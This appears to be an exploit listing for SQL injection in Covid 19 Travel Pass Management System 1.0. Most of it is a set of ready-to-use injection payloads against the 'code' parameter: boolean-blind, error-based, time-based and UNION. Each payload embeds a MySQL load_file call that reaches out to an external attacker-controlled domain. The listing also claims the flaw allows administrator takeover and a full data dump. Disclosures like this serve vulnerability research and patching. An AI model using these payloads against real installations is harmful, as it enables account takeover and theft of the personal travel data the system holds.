Exploit for Covid 19 Travel Pass Management System 1.0 SQL Injection

Name: Exploit for Covid 19 Travel Pass Management System 1.0 SQL Injection
Rating: 5 (157 reviews)
2022-05-02 | CVSS 0.9
## https://sploitus.com/exploit?id=PACKETSTORM:166910
## Title: Covid 19 Travel Pass Management System v1.0 SQLi  
## Author: nu11secur1ty  
## Date: 05.01.2022  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management  
  
## Description:  
The `code` parameter appears to be vulnerable to SQL injection  
attacks. The payload '+(select  
load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+'  
was submitted in the code parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed.  
The attacker can take administrator accounts control and also of all  
accounts on this system, also the malicious user can download all  
information about this system.  
  
Status: CRITICAL  
  
[+] Payloads:  
  
```mysql  
  
---  
Parameter: code (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: page=view_pass&code=775545'+(select  
load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''  
OR NOT 7325=7325 AND 'vRQn'='vRQn  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: page=view_pass&code=775545'+(select  
load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''  
AND (SELECT 1607 FROM(SELECT COUNT(*),CONCAT(0x7171707071,(SELECT  
(ELT(1607=1607,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HjrM'='HjrM  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: page=view_pass&code=775545'+(select  
load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''  
AND (SELECT 2775 FROM (SELECT(SLEEP(5)))lkxH) AND 'bdqR'='bdqR  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 10 columns  
Payload: page=view_pass&code=775545'+(select  
load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''  
UNION ALL SELECT  
NULL,CONCAT(0x7171707071,0x584d675163465844744f504c484d4256425463675863674948566f6b68474f464f64634e6b5a596a,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management)  
  
## Proof and Exploit:  
[href](https://streamable.com/huye3b)